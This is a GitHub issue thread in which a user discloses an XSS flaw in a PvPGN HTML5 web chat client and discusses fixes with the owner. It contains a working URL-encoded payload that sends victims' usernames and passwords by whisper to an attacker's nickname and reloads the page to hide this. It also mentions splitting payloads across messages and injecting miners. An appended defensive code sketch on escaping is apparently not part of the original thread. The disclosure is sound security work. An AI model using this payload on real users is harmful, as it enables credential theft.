This chat is not secure #2

Open
StarveTheEgo opened this issue Jun 3, 2019 · 10 comments
Comments

@StarveTheEgo

StarveTheEgo commented Jun 3, 2019

It does not filter various so-called 'URL-encoded' characters (read, for example, RFC 3986).
And actually, it does not filter anything evil; this is just a simple example of an exploit:

For example, if this one is sent to web chat users, they will send their login credentials to YOUR_NICK_NAME_HERE:

%3Cimg src=asfasf onerror=body.hidden=true;pvpgn.sendMsg([`/w`,`YOUR_NICK_NAME_HERE`,$D(`username`).value,$D(`password`).value].join(String.fromCharCode(32)));$D(`chatBox`).innerHTML=``;setTimeout(function(){location.reload()},1000);%3E

I suggest you stop using this tool (since the author is not active either) until the next patches by the author or someone else.
Thanks for your attention!

@reillychase
Owner

Are you saying other chat users can do an XSS exploit which whispers the credentials to them? Or that the web developer could modify the source to steal credentials?

@StarveTheEgo
Author

Oh, I thought you were not active (most authors are, for some reason...)
Sorry then, I might try a pull request.

I mean users can do an XSS exploit,
either to steal passwords (like in my example: just write it to someone via whisper, or just in the channel), or to inject a bitcoin-mining script.

@reillychase
Owner

I haven't been active on this in 2 years, it was just a fun project but I later took the website offline.

So if someone gets into a pvpgn chat channel with someone else who is using this client, they can XSS them by sending that message into chat? I think PvPGN limits the amount of characters in a message which would make it trickier to exploit but not impossible.

I love a good hack so I will have to set this up just to see it. Nice find. It makes sense though since the text coming from the user needs to be filtered before included into the html of the chat output on the website.

@StarveTheEgo
Author

StarveTheEgo commented Jun 3, 2019

> So if someone gets into a pvpgn chat channel with someone else who is using this client, they can XSS them by sending that message into chat? I think PvPGN limits the amount of characters in a message which would make it trickier to exploit but not impossible.

Well, it worked and there is nothing tricky about it; I tested it well.
Still, if some specific PvPGN has some impossible limits, it can be tricky, yeah. You just put things into the global scope, part by part, message by message, and then run that combination.

@reillychase
Owner

Any way I can DM you to ask a few questions?

@StarveTheEgo
Author

That example also reloads the page, just to make it less noticeable.

@StarveTheEgo
Author

StarveTheEgo commented Jun 3, 2019

Well, I am old for these things; it was "PM" for me all the time.
By "DM" I probably understand Discord Message, and yeah, I have an account there: 1789#0223

@reillychase
Owner

To fix this, I think all "escapeHtml"s need to be changed to filter XSS in this file:

https://github.com/reillychase/pvpgn-html5-chat-client/blob/master/static/js/websockify/wspvpgn.js

@StarveTheEgo
Author

Exactly

@StarveTheEgo
Author

StarveTheEgo commented Jun 3, 2019

Sorry for the spam here, I am not a strong GitHub user yet.

I would also suggest avoiding innerHTML usage and adding new elements using node objects.
This is probably not a good idea, but way better than innerHTML usage on untrusted data.
Also, it will not recreate the entire DOM tree, like it does here:
$D("pvpgn").innerHTML = full_list;
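A defensive sketch of the two fixes discussed in this thread (percent-decode before escaping so `%3C` cannot get past the filter, and DOM nodes instead of innerHTML), added here as an illustration and not code from reillychase's client; `safeDecode`, `appendChatLine` and the fake `document` are assumptions made for this example.

```javascript
// Added illustration, not code from the pvpgn-html5-chat-client project.
// Assumption (from the report that "%3C" passes the filter): message text is
// percent-decoded somewhere after the existing escapeHtml step.

// Percent-decode without throwing on malformed input such as "100% sure".
function safeDecode(text) {
  try { return decodeURIComponent(text); } catch (e) { return text; }
}

// Escape everything that can open a tag or close an attribute. Decoding runs
// FIRST, so an encoded "<" can no longer slip past the escape step.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return safeDecode(String(text)).replace(/[&<>"']/g, (c) => map[c]);
}

// The fix proposed in the thread: build DOM nodes instead of writing HTML
// strings. Text placed with createTextNode is never parsed as markup, and
// appending a node keeps the existing chat lines instead of rebuilding them.
// `doc` is a parameter only so the function can run outside a browser.
function appendChatLine(doc, container, nick, message) {
  const line = doc.createElement('div');
  const who = doc.createElement('b');
  who.appendChild(doc.createTextNode(nick + ': '));
  line.appendChild(who);
  line.appendChild(doc.createTextNode(safeDecode(message)));
  container.appendChild(line);
  return line;
}

// Constructed stand-in for `document` (minimal, for running in Node only).
function fakeDocument() {
  const element = (tag) => ({
    tag, text: '', children: [],
    appendChild(child) { this.children.push(child); return child; },
  });
  return {
    createElement: element,
    createTextNode: (text) => ({ tag: '#text', text, children: [] }),
  };
}

// Flatten a (fake) node tree back to its visible text.
function visibleText(node) {
  return node.tag === '#text' ? node.text : node.children.map(visibleText).join('');
}
```

In a browser, pass the real `document` and the chat container element; the decoded message lands in a text node, so markup in it is displayed rather than executed.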
